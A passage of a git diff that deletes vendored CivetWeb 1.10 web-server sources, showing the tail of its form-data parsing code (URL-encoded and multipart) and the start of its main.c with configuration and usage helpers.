-				}
-			}
-
-			/* if (field_storage == FORM_FIELD_STORAGE_READ) { */
-			/* The idea of "field_storage=read" is to let the API user read
-			 * data chunk by chunk and to some data processing on the fly.
-			 * This should avoid the need to store data in the server:
-			 * It should neither be stored in memory, like
-			 * "field_storage=get" does, nor in a file like
-			 * "field_storage=store".
-			 * However, for a "GET" request this does not make any much
-			 * sense, since the data is already stored in memory, as it is
-			 * part of the query string.
-			 */
-			/* } */
-
-			if ((field_storage & FORM_FIELD_STORAGE_ABORT)
-			    == FORM_FIELD_STORAGE_ABORT) {
-				/* Stop parsing the request */
-				break;
-			}
-
-			/* Proceed to next entry */
-			data = next;
-		}
-
-		return field_count;
-	}
-
-	content_type = mg_get_header(conn, "Content-Type");
-
-	if (!content_type
-	    || !mg_strcasecmp(content_type, "APPLICATION/X-WWW-FORM-URLENCODED")
-	    || !mg_strcasecmp(content_type, "APPLICATION/WWW-FORM-URLENCODED")) {
-		/* The form data is in the request body data, encoded in key/value
-		 * pairs. */
-		int all_data_read = 0;
-
-		/* Read body data and split it in keys and values.
-		 * The encoding is like in the "GET" case above: a=1&b&c=3&c=4.
-		 * Here we use "POST", and read the data from the request body.
-		 * The data read on the fly, so it is not required to buffer the
-		 * entire request in memory before processing it. */
-		for (;;) {
-			const char *val;
-			const char *next;
-			ptrdiff_t keylen, vallen;
-			ptrdiff_t used;
-			int end_of_key_value_pair_found = 0;
-			int get_block;
-
-			if ((size_t)buf_fill < (sizeof(buf) - 1)) {
-
-				size_t to_read = sizeof(buf) - 1 - (size_t)buf_fill;
-				r = mg_read(conn, buf + (size_t)buf_fill, to_read);
-				if (r < 0) {
-					/* read error */
-					return -1;
-				}
-				if (r != (int)to_read) {
-					/* TODO: Create a function to get "all_data_read" from
-					 * the conn object. All data is read if the Content-Length
-					 * has been reached, or if chunked encoding is used and
-					 * the end marker has been read, or if the connection has
-					 * been closed. */
-					all_data_read = 1;
-				}
-				buf_fill += r;
-				buf[buf_fill] = 0;
-				if (buf_fill < 1) {
-					break;
-				}
-			}
-
-			val = strchr(buf, '=');
-
-			if (!val) {
-				break;
-			}
-			keylen = val - buf;
-			val++;
-
-			/* Call callback */
-			memset(path, 0, sizeof(path));
-			field_count++;
-			field_storage = url_encoded_field_found(conn,
-			                                        buf,
-			                                        (size_t)keylen,
-			                                        NULL,
-			                                        0,
-			                                        path,
-			                                        sizeof(path) - 1,
-			                                        fdh);
-
-			if ((field_storage & FORM_FIELD_STORAGE_ABORT)
-			    == FORM_FIELD_STORAGE_ABORT) {
-				/* Stop parsing the request */
-				break;
-			}
-
-			if (field_storage == FORM_FIELD_STORAGE_STORE) {
-				if (mg_fopen(conn, path, MG_FOPEN_MODE_WRITE, &fstore) == 0) {
-					fstore.access.fp = NULL;
-				}
-				file_size = 0;
-				if (!fstore.access.fp) {
-					mg_cry(conn, "%s: Cannot create file %s", __func__, path);
-				}
-			}
-
-			get_block = 0;
-			/* Loop to read values larger than sizeof(buf)-keylen-2 */
-			do {
-				next = strchr(val, '&');
-				if (next) {
-					vallen = next - val;
-					next++;
-					end_of_key_value_pair_found = 1;
-				} else {
-					vallen = (ptrdiff_t)strlen(val);
-					next = val + vallen;
-				}
-
-				if (field_storage == FORM_FIELD_STORAGE_GET) {
-#if 0
-					if (!end_of_key_value_pair_found && !all_data_read) {
-						/* This callback will deliver partial contents */
-					}
-#else
-					(void)all_data_read; /* avoid warning */
-#endif
-
-					/* Call callback */
-					url_encoded_field_get(conn,
-					                      ((get_block > 0) ? NULL : buf),
-					                      ((get_block > 0) ? 0
-					                                       : (size_t)keylen),
-					                      val,
-					                      (size_t)vallen,
-					                      fdh);
-					get_block++;
-				}
-				if (fstore.access.fp) {
-					size_t n = (size_t)
-					    fwrite(val, 1, (size_t)vallen, fstore.access.fp);
-					if ((n != (size_t)vallen) || (ferror(fstore.access.fp))) {
-						mg_cry(conn,
-						       "%s: Cannot write file %s",
-						       __func__,
-						       path);
-						mg_fclose(&fstore.access);
-						remove_bad_file(conn, path);
-					}
-					file_size += (int64_t)n;
-				}
-
-				if (!end_of_key_value_pair_found) {
-					used = next - buf;
-					memmove(buf,
-					        buf + (size_t)used,
-					        sizeof(buf) - (size_t)used);
-					buf_fill -= (int)used;
-					if ((size_t)buf_fill < (sizeof(buf) - 1)) {
-
-						size_t to_read = sizeof(buf) - 1 - (size_t)buf_fill;
-						r = mg_read(conn, buf + (size_t)buf_fill, to_read);
-						if (r < 0) {
-							/* read error */
-							return -1;
-						}
-						if (r != (int)to_read) {
-							/* TODO: Create a function to get "all_data_read"
-							 * from the conn object. All data is read if the
-							 * Content-Length has been reached, or if chunked
-							 * encoding is used and the end marker has been
-							 * read, or if the connection has been closed. */
-							all_data_read = 1;
-						}
-						buf_fill += r;
-						buf[buf_fill] = 0;
-						if (buf_fill < 1) {
-							break;
-						}
-						val = buf;
-					}
-				}
-
-			} while (!end_of_key_value_pair_found);
-
-			if (fstore.access.fp) {
-				r = mg_fclose(&fstore.access);
-				if (r == 0) {
-					/* stored successfully */
-					field_stored(conn, path, file_size, fdh);
-				} else {
-					mg_cry(conn, "%s: Error saving file %s", __func__, path);
-					remove_bad_file(conn, path);
-				}
-				fstore.access.fp = NULL;
-			}
-
-			/* Proceed to next entry */
-			used = next - buf;
-			memmove(buf, buf + (size_t)used, sizeof(buf) - (size_t)used);
-			buf_fill -= (int)used;
-		}
-
-		return field_count;
-	}
-
-	if (!mg_strncasecmp(content_type, "MULTIPART/FORM-DATA;", 20)) {
-		/* The form data is in the request body data, encoded as multipart
-		 * content (see https://www.ietf.org/rfc/rfc1867.txt,
-		 * https://www.ietf.org/rfc/rfc2388.txt). */
-		char *boundary;
-		size_t bl;
-		ptrdiff_t used;
-		struct mg_request_info part_header;
-		char *hbuf;
-		const char *content_disp, *hend, *fbeg, *fend, *nbeg, *nend;
-		const char *next;
-		unsigned part_no;
-
-		memset(&part_header, 0, sizeof(part_header));
-
-		/* Skip all spaces between MULTIPART/FORM-DATA; and BOUNDARY= */
-		bl = 20;
-		while (content_type[bl] == ' ') {
-			bl++;
-		}
-
-		/* There has to be a BOUNDARY definition in the Content-Type header */
-		if (mg_strncasecmp(content_type + bl, "BOUNDARY=", 9)) {
-			/* Malformed request */
-			return -1;
-		}
-
-		/* Copy boundary string to variable "boundary" */
-		fbeg = content_type + bl + 9;
-		bl = strlen(fbeg);
-		boundary = (char *)mg_malloc(bl + 1);
-		if (!boundary) {
-			/* Out of memory */
-			mg_cry(conn,
-			       "%s: Cannot allocate memory for boundary [%lu]",
-			       __func__,
-			       (unsigned long)bl);
-			return -1;
-		}
-		memcpy(boundary, fbeg, bl);
-		boundary[bl] = 0;
-
-		/* RFC 2046 permits the boundary string to be quoted. */
-		/* If the boundary is quoted, trim the quotes */
-		if (boundary[0] == '"') {
-			hbuf = strchr(boundary + 1, '"');
-			if ((!hbuf) || (*hbuf != '"')) {
-				/* Malformed request */
-				mg_free(boundary);
-				return -1;
-			}
-			*hbuf = 0;
-			memmove(boundary, boundary + 1, bl);
-			bl = strlen(boundary);
-		}
-
-		/* Do some sanity checks for boundary lengths */
-		if (bl > 70) {
-			/* From RFC 2046:
-			 * Boundary delimiters must not appear within the
-			 * encapsulated material, and must be no longer
-			 * than 70 characters, not counting the two
-			 * leading hyphens.
-			 */
-
-			/* The initial sanity check
-			 * (bl + 800 > sizeof(buf))
-			 * is no longer required, since sizeof(buf) == 1024
-			 *
-			 * Original comment:
-			 */
-			/* Sanity check:  The algorithm can not work if bl >= sizeof(buf),
-			 * and it will not work effectively, if the buf is only a few byte
-			 * larger than bl, or if buf can not hold the multipart header
-			 * plus the boundary.
-			 * Check some reasonable number here, that should be fulfilled by
-			 * any reasonable request from every browser. If it is not
-			 * fulfilled, it might be a hand-made request, intended to
-			 * interfere with the algorithm. */
-			mg_free(boundary);
-			return -1;
-		}
-		if (bl < 4) {
-			/* Sanity check:  A boundary string of less than 4 bytes makes
-			 * no sense either. */
-			mg_free(boundary);
-			return -1;
-		}
-
-		for (part_no = 0;; part_no++) {
-			size_t towrite, n;
-			int get_block;
-
-			r = mg_read(conn,
-			            buf + (size_t)buf_fill,
-			            sizeof(buf) - 1 - (size_t)buf_fill);
-			if (r < 0) {
-				/* read error */
-				mg_free(boundary);
-				return -1;
-			}
-			buf_fill += r;
-			buf[buf_fill] = 0;
-			if (buf_fill < 1) {
-				/* No data */
-				mg_free(boundary);
-				return -1;
-			}
-
-			if (part_no == 0) {
-				int d = 0;
-				while ((buf[d] != '-') && (d < buf_fill)) {
-					d++;
-				}
-				if ((d > 0) && (buf[d] == '-')) {
-					memmove(buf, buf + d, (unsigned)buf_fill - (unsigned)d);
-					buf_fill -= d;
-					buf[buf_fill] = 0;
-				}
-			}
-
-			if (buf[0] != '-' || buf[1] != '-') {
-				/* Malformed request */
-				mg_free(boundary);
-				return -1;
-			}
-			if (strncmp(buf + 2, boundary, bl)) {
-				/* Malformed request */
-				mg_free(boundary);
-				return -1;
-			}
-			if (buf[bl + 2] != '\r' || buf[bl + 3] != '\n') {
-				/* Every part must end with \r\n, if there is another part.
-				 * The end of the request has an extra -- */
-				if (((size_t)buf_fill != (size_t)(bl + 6))
-				    || (strncmp(buf + bl + 2, "--\r\n", 4))) {
-					/* Malformed request */
-					mg_free(boundary);
-					return -1;
-				}
-				/* End of the request */
-				break;
-			}
-
-			/* Next, we need to get the part header: Read until \r\n\r\n */
-			hbuf = buf + bl + 4;
-			hend = strstr(hbuf, "\r\n\r\n");
-			if (!hend) {
-				/* Malformed request */
-				mg_free(boundary);
-				return -1;
-			}
-
-			part_header.num_headers =
-			    parse_http_headers(&hbuf, part_header.http_headers);
-			if ((hend + 2) != hbuf) {
-				/* Malformed request */
-				mg_free(boundary);
-				return -1;
-			}
-
-			/* Skip \r\n\r\n */
-			hend += 4;
-
-			/* According to the RFC, every part has to have a header field like:
-			 * Content-Disposition: form-data; name="..." */
-			content_disp = get_header(part_header.http_headers,
-			                          part_header.num_headers,
-			                          "Content-Disposition");
-			if (!content_disp) {
-				/* Malformed request */
-				mg_free(boundary);
-				return -1;
-			}
-
-			/* Get the mandatory name="..." part of the Content-Disposition
-			 * header. */
-			nbeg = strstr(content_disp, "name=\"");
-			while ((nbeg != NULL) && (strcspn(nbeg - 1, ":,; \t") != 0)) {
-				/* It could be somethingname= instead of name= */
-				nbeg = strstr(nbeg + 1, "name=\"");
-			}
-
-			/* This line is not required, but otherwise some compilers
-			 * generate spurious warnings. */
-			nend = nbeg;
-			/* And others complain, the result is unused. */
-			(void)nend;
-
-			/* If name=" is found, search for the closing " */
-			if (nbeg) {
-				nbeg += 6;
-				nend = strchr(nbeg, '\"');
-				if (!nend) {
-					/* Malformed request */
-					mg_free(boundary);
-					return -1;
-				}
-			} else {
-				/* name= without quotes is also allowed */
-				nbeg = strstr(content_disp, "name=");
-				while ((nbeg != NULL) && (strcspn(nbeg - 1, ":,; \t") != 0)) {
-					/* It could be somethingname= instead of name= */
-					nbeg = strstr(nbeg + 1, "name=");
-				}
-				if (!nbeg) {
-					/* Malformed request */
-					mg_free(boundary);
-					return -1;
-				}
-				nbeg += 5;
-
-				/* RFC 2616 Sec. 2.2 defines a list of allowed
-				 * separators, but many of them make no sense
-				 * here, e.g. various brackets or slashes.
-				 * If they are used, probably someone is
-				 * trying to attack with curious hand made
-				 * requests. Only ; , space and tab seem to be
-				 * reasonable here. Ignore everything else. */
-				nend = nbeg + strcspn(nbeg, ",; \t");
-			}
-
-			/* Get the optional filename="..." part of the Content-Disposition
-			 * header. */
-			fbeg = strstr(content_disp, "filename=\"");
-			while ((fbeg != NULL) && (strcspn(fbeg - 1, ":,; \t") != 0)) {
-				/* It could be somethingfilename= instead of filename= */
-				fbeg = strstr(fbeg + 1, "filename=\"");
-			}
-
-			/* This line is not required, but otherwise some compilers
-			 * generate spurious warnings. */
-			fend = fbeg;
-
-			/* If filename=" is found, search for the closing " */
-			if (fbeg) {
-				fbeg += 10;
-				fend = strchr(fbeg, '\"');
-
-				if (!fend) {
-					/* Malformed request (the filename field is optional, but if
-					 * it exists, it needs to be terminated correctly). */
-					mg_free(boundary);
-					return -1;
-				}
-
-				/* TODO: check Content-Type */
-				/* Content-Type: application/octet-stream */
-			}
-			if (!fbeg) {
-				/* Try the same without quotes */
-				fbeg = strstr(content_disp, "filename=");
-				while ((fbeg != NULL) && (strcspn(fbeg - 1, ":,; \t") != 0)) {
-					/* It could be somethingfilename= instead of filename= */
-					fbeg = strstr(fbeg + 1, "filename=");
-				}
-				if (fbeg) {
-					fbeg += 9;
-					fend = fbeg + strcspn(fbeg, ",; \t");
-				}
-			}
-			if (!fbeg) {
-				fend = NULL;
-			}
-
-			/* In theory, it could be possible that someone crafts
-			 * a request like name=filename=xyz. Check if name and
-			 * filename do not overlap. */
-			if (!(((ptrdiff_t)fbeg > (ptrdiff_t)nend)
-			      || ((ptrdiff_t)nbeg > (ptrdiff_t)fend))) {
-				mg_free(boundary);
-				return -1;
-			}
-
-			/* Call callback for new field */
-			memset(path, 0, sizeof(path));
-			field_count++;
-			field_storage = url_encoded_field_found(conn,
-			                                        nbeg,
-			                                        (size_t)(nend - nbeg),
-			                                        fbeg,
-			                                        (size_t)(fend - fbeg),
-			                                        path,
-			                                        sizeof(path) - 1,
-			                                        fdh);
-
-			/* If the boundary is already in the buffer, get the address,
-			 * otherwise next will be NULL. */
-			next = search_boundary(hbuf,
-			                       (size_t)((buf - hbuf) + buf_fill),
-			                       boundary,
-			                       bl);
-
-			if (field_storage == FORM_FIELD_STORAGE_STORE) {
-				/* Store the content to a file */
-				if (mg_fopen(conn, path, MG_FOPEN_MODE_WRITE, &fstore) == 0) {
-					fstore.access.fp = NULL;
-				}
-				file_size = 0;
-
-				if (!fstore.access.fp) {
-					mg_cry(conn, "%s: Cannot create file %s", __func__, path);
-				}
-			}
-
-			get_block = 0;
-			while (!next) {
-				/* Set "towrite" to the number of bytes available
-				 * in the buffer */
-				towrite = (size_t)(buf - hend + buf_fill);
-				/* Subtract the boundary length, to deal with
-				 * cases the boundary is only partially stored
-				 * in the buffer. */
-				towrite -= bl + 4;
-
-				if (field_storage == FORM_FIELD_STORAGE_GET) {
-					unencoded_field_get(conn,
-					                    ((get_block > 0) ? NULL : nbeg),
-					                    ((get_block > 0)
-					                         ? 0
-					                         : (size_t)(nend - nbeg)),
-					                    hend,
-					                    towrite,
-					                    fdh);
-					get_block++;
-				}
-
-				if (field_storage == FORM_FIELD_STORAGE_STORE) {
-					if (fstore.access.fp) {
-
-						/* Store the content of the buffer. */
-						n = (size_t)fwrite(hend, 1, towrite, fstore.access.fp);
-						if ((n != towrite) || (ferror(fstore.access.fp))) {
-							mg_cry(conn,
-							       "%s: Cannot write file %s",
-							       __func__,
-							       path);
-							mg_fclose(&fstore.access);
-							remove_bad_file(conn, path);
-						}
-						file_size += (int64_t)n;
-					}
-				}
-
-				memmove(buf, hend + towrite, bl + 4);
-				buf_fill = (int)(bl + 4);
-				hend = buf;
-
-				/* Read new data */
-				r = mg_read(conn,
-				            buf + (size_t)buf_fill,
-				            sizeof(buf) - 1 - (size_t)buf_fill);
-				if (r < 0) {
-					/* read error */
-					mg_free(boundary);
-					return -1;
-				}
-				buf_fill += r;
-				buf[buf_fill] = 0;
-				if (buf_fill < 1) {
-					/* No data */
-					mg_free(boundary);
-					return -1;
-				}
-
-				/* Find boundary */
-				next = search_boundary(buf, (size_t)buf_fill, boundary, bl);
-			}
-
-			towrite = (size_t)(next - hend);
-
-			if (field_storage == FORM_FIELD_STORAGE_GET) {
-				/* Call callback */
-				unencoded_field_get(conn,
-				                    ((get_block > 0) ? NULL : nbeg),
-				                    ((get_block > 0) ? 0
-				                                     : (size_t)(nend - nbeg)),
-				                    hend,
-				                    towrite,
-				                    fdh);
-			}
-
-			if (field_storage == FORM_FIELD_STORAGE_STORE) {
-
-				if (fstore.access.fp) {
-					n = (size_t)fwrite(hend, 1, towrite, fstore.access.fp);
-					if ((n != towrite) || (ferror(fstore.access.fp))) {
-						mg_cry(conn,
-						       "%s: Cannot write file %s",
-						       __func__,
-						       path);
-						mg_fclose(&fstore.access);
-						remove_bad_file(conn, path);
-					} else {
-						file_size += (int64_t)n;
-						r = mg_fclose(&fstore.access);
-						if (r == 0) {
-							/* stored successfully */
-							field_stored(conn, path, file_size, fdh);
-						} else {
-							mg_cry(conn,
-							       "%s: Error saving file %s",
-							       __func__,
-							       path);
-							remove_bad_file(conn, path);
-						}
-					}
-					fstore.access.fp = NULL;
-				}
-			}
-
-			if ((field_storage & FORM_FIELD_STORAGE_ABORT)
-			    == FORM_FIELD_STORAGE_ABORT) {
-				/* Stop parsing the request */
-				break;
-			}
-
-			/* Remove from the buffer */
-			used = next - buf + 2;
-			memmove(buf, buf + (size_t)used, sizeof(buf) - (size_t)used);
-			buf_fill -= (int)used;
-		}
-
-		/* All parts handled */
-		mg_free(boundary);
-		return field_count;
-	}
-
-	/* Unknown Content-Type */
-	return -1;
-}
-
-
-/* End of handle_form.inl */
diff --git a/thirdparty/civetweb-1.10/src/main.c b/thirdparty/civetweb-1.10/src/main.c
deleted file mode 100644
index d8e9e9d..0000000
--- a/thirdparty/civetweb-1.10/src/main.c
+++ /dev/null
@@ -1,2856 +0,0 @@
-/* Copyright (c) 2013-2017 the Civetweb developers
- * Copyright (c) 2004-2013 Sergey Lyubka
- *
- * Permission is hereby granted, free of charge, to any person obtaining a copy
- * of this software and associated documentation files (the "Software"), to deal
- * in the Software without restriction, including without limitation the rights
- * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
- * copies of the Software, and to permit persons to whom the Software is
- * furnished to do so, subject to the following conditions:
- *
- * The above copyright notice and this permission notice shall be included in
- * all copies or substantial portions of the Software.
- *
- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
- * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
- * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
- * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
- * THE SOFTWARE.
-*/
-
-#if defined(_WIN32)
-
-#ifndef _CRT_SECURE_NO_WARNINGS
-#define _CRT_SECURE_NO_WARNINGS /* Disable deprecation warning in VS2005 */
-#endif
-#ifndef _CRT_SECURE_NO_DEPRECATE
-#define _CRT_SECURE_NO_DEPRECATE
-#endif
-#ifdef WIN32_LEAN_AND_MEAN
-#undef WIN32_LEAN_AND_MEAN /* Required for some functions (tray icons, ...) */
-#endif
-
-#else
-
-#define _XOPEN_SOURCE 600 /* For PATH_MAX on linux */
-/* This should also be sufficient for "realpath", according to
- * http://man7.org/linux/man-pages/man3/realpath.3.html, but in
- * reality it does not seem to work. */
-/* In case this causes a problem, disable the warning:
- * #pragma GCC diagnostic ignored "-Wimplicit-function-declaration"
- * #pragma clang diagnostic ignored "-Wimplicit-function-declaration"
- */
-#endif
-
-#ifndef IGNORE_UNUSED_RESULT
-#define IGNORE_UNUSED_RESULT(a) ((void)((a) && 1))
-#endif
-
-#if defined(__cplusplus) && (__cplusplus >= 201103L)
-#define NO_RETURN [[noreturn]]
-#elif defined(__STDC_VERSION__) && (__STDC_VERSION__ >= 201112L)
-#define NO_RETURN _Noreturn
-#elif defined(__GNUC__)
-#define NO_RETURN __attribute((noreturn))
-#else
-#define NO_RETURN
-#endif
-
-/* Use same defines as in civetweb.c before including system headers. */
-#ifndef _LARGEFILE_SOURCE
-#define _LARGEFILE_SOURCE /* For fseeko(), ftello() */
-#endif
-#ifndef _FILE_OFFSET_BITS
-#define _FILE_OFFSET_BITS 64 /* Use 64-bit file offsets by default */
-#endif
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS /* <inttypes.h> wants this for C++ */
-#endif
-#ifndef __STDC_LIMIT_MACROS
-#define __STDC_LIMIT_MACROS /* C++ wants that for INT64_MAX */
-#endif
-
-#include <string.h>
-#include <errno.h>
-#include <sys/stat.h>
-#include <stdio.h>
-#include <stdint.h>
-#include <limits.h>
-#include <stdlib.h>
-#include <signal.h>
-#include <stddef.h>
-#include <stdarg.h>
-#include <ctype.h>
-#include <assert.h>
-
-#include "civetweb.h"
-
-#define printf                                                                 \
-	DO_NOT_USE_THIS_FUNCTION__USE_fprintf /* Required for unit testing */
-
-#if defined(_WIN32)                                                            \
-    && !defined(__SYMBIAN32__) /* WINDOWS / UNIX include block */
-#ifndef _WIN32_WINNT
-#define _WIN32_WINNT 0x0501 /* for tdm-gcc so we can use getconsolewindow */
-#endif
-#undef UNICODE
-#include <windows.h>
-#include <winsvc.h>
-#include <shlobj.h>
-#include <io.h>
-
-#define getcwd(a, b) (_getcwd(a, b))
-#if !defined(__MINGW32__)
-extern char *_getcwd(char *buf, size_t size);
-#endif
-
-#ifndef PATH_MAX
-#define PATH_MAX MAX_PATH
-#endif
-
-#ifndef S_ISDIR
-#define S_ISDIR(x) ((x)&_S_IFDIR)
-#endif
-
-#define DIRSEP '\\'
-#define snprintf _snprintf
-#define vsnprintf _vsnprintf
-#define sleep(x) (Sleep((x)*1000))
-#define WINCDECL __cdecl
-#define abs_path(rel, abs, abs_size) (_fullpath((abs), (rel), (abs_size)))
-
-#else /* defined(_WIN32) && !defined(__SYMBIAN32__) - WINDOWS / UNIX include   \
-         block */
-
-#include <unistd.h>
-#include <sys/utsname.h>
-#include <sys/wait.h>
-
-#define DIRSEP '/'
-#define WINCDECL
-#define abs_path(rel, abs, abs_size) (realpath((rel), (abs)))
-
-#endif /* defined(_WIN32) && !defined(__SYMBIAN32__) - WINDOWS / UNIX include  \
-          block */
-
-#ifndef PATH_MAX
-#define PATH_MAX (1024)
-#endif
-
-#define MAX_OPTIONS (50)
-#define MAX_CONF_FILE_LINE_SIZE (8 * 1024)
-
-struct tuser_data {
-	char *first_message;
-};
-
-
-static int g_exit_flag = 0;         /* Main loop should exit */
-static char g_server_base_name[40]; /* Set by init_server_name() */
-static const char *g_server_name;   /* Set by init_server_name() */
-static const char *g_icon_name;     /* Set by init_server_name() */
-static const char *g_website;       /* Set by init_server_name() */
-static char *g_system_info;         /* Set by init_system_info() */
-static char g_config_file_name[PATH_MAX] =
-    "";                          /* Set by process_command_line_arguments() */
-static struct mg_context *g_ctx; /* Set by start_civetweb() */
-static struct tuser_data
-    g_user_data; /* Passed to mg_start() by start_civetweb() */
-
-#if !defined(CONFIG_FILE)
-#define CONFIG_FILE "civetweb.conf"
-#endif /* !CONFIG_FILE */
-
-#if !defined(PASSWORDS_FILE_NAME)
-#define PASSWORDS_FILE_NAME ".htpasswd"
-#endif
-
-/* backup config file */
-#if !defined(CONFIG_FILE2) && defined(__linux__)
-#define CONFIG_FILE2 "/usr/local/etc/civetweb.conf"
-#endif
-
-enum { OPTION_TITLE, OPTION_ICON, OPTION_WEBPAGE, NUM_MAIN_OPTIONS };
-
-static struct mg_option main_config_options[] = {
-    {"title", CONFIG_TYPE_STRING, NULL},
-    {"icon", CONFIG_TYPE_STRING, NULL},
-    {"website", CONFIG_TYPE_STRING, NULL},
-    {NULL, CONFIG_TYPE_UNKNOWN, NULL}};
-
-
-static void WINCDECL
-signal_handler(int sig_num)
-{
-	g_exit_flag = sig_num;
-}
-
-
-static NO_RETURN void
-die(const char *fmt, ...)
-{
-	va_list ap;
-	char msg[512] = "";
-
-	va_start(ap, fmt);
-	(void)vsnprintf(msg, sizeof(msg) - 1, fmt, ap);
-	msg[sizeof(msg) - 1] = 0;
-	va_end(ap);
-
-#if defined(_WIN32)
-	MessageBox(NULL, msg, "Error", MB_OK);
-#else
-	fprintf(stderr, "%s\n", msg);
-#endif
-
-	exit(EXIT_FAILURE);
-}
-
-
-#ifdef WIN32
-static int MakeConsole(void);
-#endif
-
-
-static void
-show_server_name(void)
-{
-#ifdef WIN32
-	(void)MakeConsole();
-#endif
-
-	fprintf(stderr, "CivetWeb v%s, built on %s\n", mg_version(), __DATE__);
-}
-
-
-static NO_RETURN void
-show_usage_and_exit(const char *exeName)
-{
-	const struct mg_option *options;
-	int i;
-
-	if (exeName == 0 || *exeName == 0) {
-		exeName = "civetweb";
-	}
-
-	show_server_name();
-
-	fprintf(stderr, "\nUsage:\n");
-	fprintf(stderr, "  Start server with a set of options:\n");
-	fprintf(stderr, "    %s [config_file]\n", exeName);
-	fprintf(stderr, "    %s [-option value ...]\n", exeName);
-	fprintf(stderr, "  Show system information:\n");
-	fprintf(stderr, "    %s -I\n", exeName);
-	fprintf(stderr, "  Add user/change password:\n");
-	fprintf(stderr,
-	        "    %s -A <htpasswd_file> <realm> <user> <passwd>\n",
-	        exeName);
-	fprintf(stderr, "  Remove user:\n");
-	fprintf(stderr, "    %s -R <htpasswd_file> <realm> <user>\n", exeName);
-	fprintf(stderr, "\nOPTIONS:\n");
-
-	options = mg_get_valid_options();
-	for (i = 0; options[i].name != NULL; i++) {
-		fprintf(stderr,
-		        "  -%s %s\n",
-		        options[i].name,
-		        ((options[i].default_value == NULL)
-		             ? "<empty>"
-		             : options[i].default_value));
-	}
-
-	options = main_config_options;
-	for (i = 0; options[i].name != NULL; i++) {
-		fprintf(stderr,
-		        "  -%s %s\n",
-		        options[i].name,
-		        ((options[i].default_value == NULL)
-		             ? "<empty>"
-		             : options[i].default_value));
-	}
-
-	exit(EXIT_FAILURE);
-}
-
-
-#if defined(_WIN32) || defined(USE_COCOA)
-static const char *config_file_top_comment =
-    "# Civetweb web server configuration file.\n"
-    "# For detailed description of every option, visit\n"
-    "# https://github.com/civetweb/civetweb/blob/master/docs/UserManual.md\n"
-    "# Lines starting with '#' and empty lines are ignored.\n"
-    "# To make a change, remove leading '#', modify option's value,\n"
-    "# save this file and then restart Civetweb.\n\n";
-
-static const char *
-get_url_to_first_open_port(const struct mg_context *ctx)
-{
-	static char url[100];
-	const char *open_ports = mg_get_option(ctx, "listening_ports");
-	int a, b, c, d, port, n;
-
-	if (sscanf(open_ports, "%d.%d.%d.%d:%d%n", &a, &b, &c, &d, &port, &n)
-	    == 5) {
-		snprintf(url,
-		         sizeof(url),
-		         "%s://%d.%d.%d.%d:%d",
-		         open_ports[n] == 's' ? "https" : "http",
-		         a,
-		         b,
-		         c,
-		         d,
-		         port);
-	} else if (sscanf(open_ports, "%d%n", &port, &n) == 1) {
-		snprintf(url,
-		         sizeof(url),
-		         "%s://localhost:%d",
-		         open_ports[n] == 's' ? "https" : "http",
-		         port);
-	} else {
-		snprintf(url, sizeof(url), "%s", "http://localhost:8080");
-	}
-
-	return url;
-}
-
-
-#ifdef ENABLE_CREATE_CONFIG_FILE
-static void
-create_config_file(const struct mg_context *ctx, const char *path)
-{
-	const struct mg_option *options;
-	const char *value;
-	FILE *fp;
-	int i;
-
-	/* Create config file if it is not present yet */
-	if ((fp = fopen(path, "r")) != NULL) {
-		fclose(fp);
-	} else if ((fp = fopen(path, "a+")) != NULL) {
-		fprintf(fp, "%s", config_file_top_comment);
-		options = mg_get_valid_options();
-		for (i = 0; options[i].name != NULL; i++) {
-			value = mg_get_option(ctx, options[i].name);
-			fprintf(fp,
-			        "# %s %s\n",
-			        options[i].name,
-			        value ? value : "<value>");
-		}
-		fclose(fp);
-	}
-}
-#endif
-#endif
-
-
-static char *
-sdup(const char *str)
-{
-	size_t len;
-	char *p;
-
-	len = strlen(str) + 1;
-	if ((p = (char *)malloc(len)) != NULL) {
-		memcpy(p, str, len);
-	}
-	return p;
-}
-
-
-#if 0 /* Unused code from "string duplicate with escape" */
-static unsigned
-hex2dec(char x)
-{
-    if ((x >= '0') && (x <= '9')) {
-        return (unsigned)x - (unsigned)'0';
-    }
-    if ((x >= 'A') && (x <= 'F')) {
-        return (unsigned)x - (unsigned)'A' + 10u;
-    }
-    if ((x >= 'a') && (x <= 'f')) {
-        return (unsigned)x - (unsigned)'a' + 10u;
-    }
-    return 0;
-}
-
-
-static char *
-sdupesc(const char *str)
-{
-	char *p = sdup(str);
-
-	if (p) {
-		char *d = p;
-		while ((d = strchr(d, '\\')) != NULL) {
-			switch (d[1]) {
-			case 'a':
-				d[0] = '\a';
-				memmove(d + 1, d + 2, strlen(d + 1));
-				break;
-			case 'b':
-				d[0] = '\b';
-				memmove(d + 1, d + 2, strlen(d + 1));
-				break;
-			case 'e':
-				d[0] = 27;
-				memmove(d + 1, d + 2, strlen(d + 1));
-				break;
-			case 'f':
-				d[0] = '\f';
-				memmove(d + 1, d + 2, strlen(d + 1));
-				break;
-			case 'n':
-				d[0] = '\n';
-				memmove(d + 1, d + 2, strlen(d + 1));
-				break;
-			case 'r':
-				d[0] = '\r';
-				memmove(d + 1, d + 2, strlen(d + 1));
-				break;
-			case 't':
-				d[0] = '\t';
-				memmove(d + 1, d + 2, strlen(d + 1));
-				break;
-			case 'u':
-				if (isxdigit(d[2]) && isxdigit(d[3]) && isxdigit(d[4])
-				    && isxdigit(d[5])) {
-					unsigned short u = (unsigned short)(hex2dec(d[2]) * 4096
-					                                    + hex2dec(d[3]) * 256
-					                                    + hex2dec(d[4]) * 16
-					                                    + hex2dec(d[5]));
-					char mbc[16];
-					int mbl = wctomb(mbc, (wchar_t)u);
-					if ((mbl > 0) && (mbl < 6)) {
-						memcpy(d, mbc, (unsigned)mbl);
-						memmove(d + mbl, d + 6, strlen(d + 5));
-						/* Advance mbl characters (+1 is below) */
-						d += (mbl - 1);
-					} else {
-						/* Invalid multi byte character */
-						/* TODO: define what to do */
-					}
-				} else {
-					/* Invalid esc sequence */
